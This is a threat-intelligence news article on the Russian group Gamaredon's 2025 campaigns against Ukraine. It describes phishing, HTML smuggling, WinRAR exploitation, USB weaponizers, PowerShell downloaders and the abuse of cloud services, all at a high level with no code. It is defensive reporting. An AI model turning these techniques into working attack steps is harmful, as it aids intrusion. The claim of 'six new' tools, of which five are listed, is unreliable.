The Russian state-sponsored hacking group known as Gamaredon has significantly escalated its cyber operations against Ukraine throughout 2025, introducing sophisticated malware and exploiting cloud services to enhance their attacks. This escalation underscores the group’s persistent focus on Ukrainian governmental and military institutions.
In 2025, Gamaredon orchestrated 35 distinct spear-phishing campaigns targeting new entities, with a concentration in the latter half of the year. These campaigns primarily aimed at Ukrainian government and military bodies, seeking to exfiltrate sensitive information to support Russian interests in the ongoing conflict.
The group’s spear-phishing tactics involved the use of archive attachments and XHTML files employing HTML smuggling techniques. These methods delivered malicious HTA downloaders, such as PteroSand, which facilitated the deployment of additional payloads. Notably, some attacks exploited a now-patched vulnerability in WinRAR (CVE-2025-8088) to place these downloaders into victims’ Windows Startup folders, ensuring execution upon the next login and establishing persistence within compromised systems.
To facilitate lateral movement within networks, Gamaredon utilized tools like PteroLNK and PteroPaste. These weaponizers infected USB and network drives with malicious LNK files. When unsuspecting users opened these files, they triggered the retrieval and execution of downloader malware, further propagating the infection.
Additionally, the group employed PteroSetup, an older VBScript weaponizer first detected in January 2021. This tool scanned USB and network drives for legitimate installer files, replacing them with 7z self-extracting archives containing both the original installer and a malicious VBScript downloader. This approach allowed Gamaredon to maintain a foothold within compromised environments.
Throughout 2025, Gamaredon increasingly relied on third-party services to obscure their operations. They utilized tunnel services and serverless worker platforms to conceal their backend infrastructure, making detection and mitigation more challenging for defenders.
The group’s malware arsenal expanded with the introduction of six new malicious PowerShell tools:
- PteroDee and PteroCache: Fetch and execute PowerShell payloads in memory.
- PteroDum: Fetch and execute VBScript payloads in memory.
- PteroOdd: Retrieve a single PowerShell payload using the Telegra.ph API, likely in collaboration with the Turla group.
- PteroEffigy: Obtain command-and-control server details via the GoFile cloud storage service.
- PteroPaste: Weaponize USB drives and download additional PowerShell payloads through an encrypted channel.
These developments highlight Gamaredon’s adaptability and commitment to enhancing their cyber capabilities. The group’s activities often coincided with major Russian and Crimean holidays, suggesting that their operators are likely government-affiliated employees.
Another significant aspect of Gamaredon’s strategy is the exploitation of legitimate online services for data exfiltration and as dead drop resolvers to obtain command-and-control server details. Services such as Telegra.ph, Teletype, Rentry.co, Write.as, Dropbox, GoFile, DEV Community (dev.to), Mastodon, Lesma, Nopaste.net, Paste.ee, Wasabi, Tebi, Intercolo, and Dropbox have been leveraged to obscure their operations and enhance the resilience of their infrastructure.
Gamaredon’s persistent evolution and creative abuse of legitimate services underscore the challenges in defending against state-sponsored cyber threats. Their ability to rapidly adapt and integrate new tools and techniques into their operations makes them a formidable adversary. As the cyber conflict between Russia and Ukraine continues, it is crucial for organizations to remain vigilant, implement robust security measures, and stay informed about emerging threats to effectively mitigate the risks posed by such advanced persistent threats.
